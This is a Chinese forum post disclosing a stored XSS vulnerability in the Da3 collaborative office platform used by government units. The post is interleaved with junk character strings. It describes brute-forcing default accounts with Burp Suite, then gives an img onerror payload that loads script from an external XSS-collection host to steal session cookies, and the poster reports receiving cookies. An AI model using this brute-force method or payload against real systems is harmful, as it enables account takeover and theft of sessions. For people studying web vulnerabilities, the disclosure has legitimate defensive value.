1 {4 S K0 E$ x$ \( u( [
6 d. @$ t7 e7 r# w* L7 ~( m 同联Da3协同办公平台后台通用储存型xss漏洞
' t4 e* M0 S i: F3 l0 s
$ t, e% r: w9 D) Z" e2 S2 J ( L& _6 C# C8 T% V! ?
平台简介:
! o1 H5 t H# s# a- g! X0 s
8 I6 k" S0 N$ t& L
z2 G: @4 e& j) \7 a& h9 d* a- d" D
' R' F& Y1 S& Q+ F- l
6 P* v2 \9 E+ l) K6 p6 } 3 E5 M( Y$ C1 }, |! X
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
4 c# j3 D/ k1 @1 _$ y同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
: {6 S b9 M" S+ d2 ?) W
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
) C5 c. y4 L! v3 ]" v: w
- s1 F; ~. Z" x- K4 ?$ T. D! u% C
( s, a$ n$ F/ L
4 a7 J; l A# ]! n( t3 s# R) R
! H" i5 F3 f2 A7 ^5 X
4 ?+ g8 j! u. X, v. k. b& O, K
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:& J8 H( |+ y e( w6 F
" W1 W( g3 d3 Y' B8 V
# M* P0 a, e" ^ E
( @$ f+ V* I4 F$ ]9 k6 \* H% s
: j' n5 p5 R0 E: l. T! w) y
% }5 Z( J. ~3 `6 I. W Z
http://1.1.1.1:7197/cap-aco/#(案例2-)
; x8 F, K5 B7 L4 r
* w/ H& P' i% N# g! A3 a / M1 ^ }* O3 m; @2 V6 Q
http://www.XXOO.com (案例1-官网网站)
- Z/ G5 X: s- q v# l
- Q- ~6 Y3 |% O# @1 w; T
, N9 E; U$ \# C# p9 f 漏洞详情:$ W2 N: ]; x. J- o( S' z
# g5 ? F5 ^: o# K' ~. s% Z
/ I$ D% R- Y8 X0 ?
案例一、
( C0 |) v- w/ R
3 p! o$ Y% l/ B8 L: h2 W3 F- H
$ P2 n* k+ L5 @( |1 C, r 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试, e: ]: k+ F8 v; I, M% c+ |6 e
/ ]4 T/ ]; ]) L # A9 |5 Z I, t
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:: p! L3 Z& W2 h# ~. v
% K- n/ |9 \ A( d
4 `, U$ q3 Z0 r5 j. `: q
9 w, R0 u; F- o
6 C% G3 ~$ {2 M9 L 8 n$ A0 D' L; c* E: ]3 t
! d: a- z$ Y! k, @0 {; Y, U
9 Q2 ?# z& U7 S8 S$ y7 E
' e( C P) b9 n& O4 F: I7 Z status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 1 X3 `& _) \/ E+ u
b* z7 u6 u q6 U* A A
& W: X9 C9 j7 T
5 F7 x6 j) \* T9 t
6 H+ M3 |4 I7 [ + v% B: _) k; E7 k: B
; l5 @: {* O) q$ i: p8 {% Y
% X7 \- b9 o, L3 n+ B
8 b0 f) ~$ Z$ c
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
+ s/ x1 y/ Q' ^4 c! E
6 t" \9 p9 w$ Q$ o
8 v' ~+ H9 N6 x) g$ u8 q
4 R I* S5 Z2 F$ C! l
4 l% u" S. [9 i9 W
8 A+ z t. f6 N* l+ {; S6 P/ @
<img src=x
1 m+ n J F+ g7 ionerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
8 s9 A; E" q5 E" w
' ^. ^' b, l& Q( d( a a % E p" A2 b8 k! n: E% ]8 ~
- Z7 K% l" J7 Z/ |8 `+ S
& c2 p0 u' x J% I; w" I4 ^
# F; b5 U: Y) H- y( T( ?$ v 然后发送,接收cookie如图:
# X: X# f6 W& S% @" D7 L7 T
4 }& _% z0 `+ T/ _$ y% i' H. S
& b5 E& Y( x' d1 X' t# m
% y7 D6 U9 P( H+ z T" S! E
$ V/ R' T& C7 B+ F" p! E
* Y% C$ ^& D$ d& {$ ? 6 ]& V1 ~6 ~0 k. w
8 c1 U; x O- i1 }3 A; C
' i% M" _/ y" Z3 b " C2 O5 \2 J5 o
9 @- J6 ?! w6 S3 Z; U g
! X7 l$ ~, ?& P. v
) N& G1 k& Y# ]
. W, u5 }" F" |% N$ T- p( P
: e. U1 n2 I0 ^$ {+ I* L- g1 c! }8 x- ~
/ Z% h2 }5 {/ f( I6 ~+ M( K
7 y$ D5 n' ]3 ^6 z3 t
- Z Y) J; {2 D" l* I | 
% n: T( @6 D# Q i* P5 V6 A$ k- h7 R! H
* c# l3 K* O5 U2 ~% T
. l' u8 r. M" o6 y" R. X1 ]) D9 L
+ l, w: d, A4 v- a' b1 Y
" D+ z& p3 y6 \ Y4 V
$ T2 ]$ K. v) E) D$ g+ p% N6 Z" V; g) F 案例2、
0 ?2 p7 v* ]! X
( m0 f6 I" s4 c 6 [& v+ z* @. h/ ]1 j% w a
前面步骤都一样,下面看效果图: 5 O9 u2 r) l1 c8 M% ~
- j* G7 E, _3 ~+ [' m! M9 g- ?" y
6 F5 }' T' F. h( [2 j- } 
' ~1 o+ I5 W9 v; \4 M
3 ]% v" U- M2 [/ m& f: u; \
# S6 e/ a% m* y* a5 f) ^ 
5 c: g3 e( G$ i+ r2 k2 Z" E
" s, j+ s- d% q/ r: K" W
# T( |: n. ? _2 W0 C6 k% K# }
' _, a8 ~% a, B3 z. m9 I
w. @) b) w& h$ [$ B: v
- s2 ^# L6 M6 Z, {- M8 M 5 R+ V4 u! P( d( f9 A0 o0 l, k" M
) h* O$ d7 r9 c( j1 F
3 G7 Y8 F: M2 X/ j4 B& d 
) k; y% H6 a3 Z
$ y8 i# {) V* O
9 @9 b- K3 j; J- _% q! [ ^
& ^+ d' y3 _) ^
0 c1 a/ r' q& M' j' h 3 c0 {. D0 n4 Z" W$ @( q
: g/ s% c, `. M R
/ o' i+ w* |& N6 p& b# }' e6 V! @
) `# u2 t. Y/ z- r/ f& I2 j
! l' d% X- a7 q: c
8 Y; I, d1 A: _4 X* k: Y% U; i4 A" J* X
2 I' d8 g6 o5 d0 K0 E& w z' A3 {& ? % |9 T& n+ F* D8 F! T {
8 O: x% U3 A% x9 C0 T* ?8 c 
发表于 2018-10-20 20:14:15
收藏
支持
反对